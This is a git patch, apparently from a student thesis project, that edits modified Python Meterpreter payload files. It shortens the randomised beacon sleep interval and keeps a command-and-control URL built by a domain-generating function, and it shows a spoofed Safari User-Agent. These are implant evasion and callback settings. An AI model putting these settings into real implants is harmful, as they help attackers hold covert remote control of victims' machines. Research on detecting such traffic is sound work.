From 6ed780dd5a178aa7a04608e1265322cd73b8cc2d Mon Sep 17 00:00:00 2001 From: paulmer <paula.merino.porras@alumnos.uva.es> Date: Thu, 16 Jun 2022 13:45:42 +0200 Subject: [PATCH] =?UTF-8?q?Actualizaci=C3=B3n=20payloads=208=20segundos?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Payloads/http/final-http.py | 2 +- Payloads/https/final-https.py | 7 ++++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/Payloads/http/final-http.py b/Payloads/http/final-http.py index 766ed69..59771ae 100644 --- a/Payloads/http/final-http.py +++ b/Payloads/http/final-http.py @@ -1145,7 +1145,7 @@ class HttpTransport(Transport): # server has nothing for us but this is fine so update the communication time and wait self.communication_last = time.time() - time.sleep(float(random.randrange(0,10000)) / 1000) + time.sleep(float(random.randrange(0,8000)) / 1000) # ************************ VARIABLE SIZES tfg************************************** diff --git a/Payloads/https/final-https.py b/Payloads/https/final-https.py index acd04c6..e0b421b 100644 --- a/Payloads/https/final-https.py +++ b/Payloads/https/final-https.py @@ -134,7 +134,7 @@ def generate_domain(): HTTP_CONNECTION_URL = 'https://'+generate_domain()+'/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/' -#HTTP_CONNECTION_URL = 'https://192.168.2.14/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/' +#HTTP_CONNECTION_URL = 'https://192.168.2.14/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/' HTTP_PROXY = None HTTP_USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15' HTTP_COOKIE = None @@ -1146,7 +1146,7 @@ class HttpTransport(Transport): # server has nothing for us but this is fine so update the communication time and wait self.communication_last = time.time() - time.sleep(float(random.randrange(0,10000)) / 1000) + time.sleep(float(random.randrange(0,8000)) / 1000) # ************************ VARIABLE SIZES tfg************************************** @@ -1485,7 +1485,8 @@ class PythonMeterpreter(object): self.transport.url = 'https://'+generate_domain()+'/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/' - + #self.transport.url = 'https://192.168.2.14/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/' + # ************************* *************************************** ************************************** -- GitLab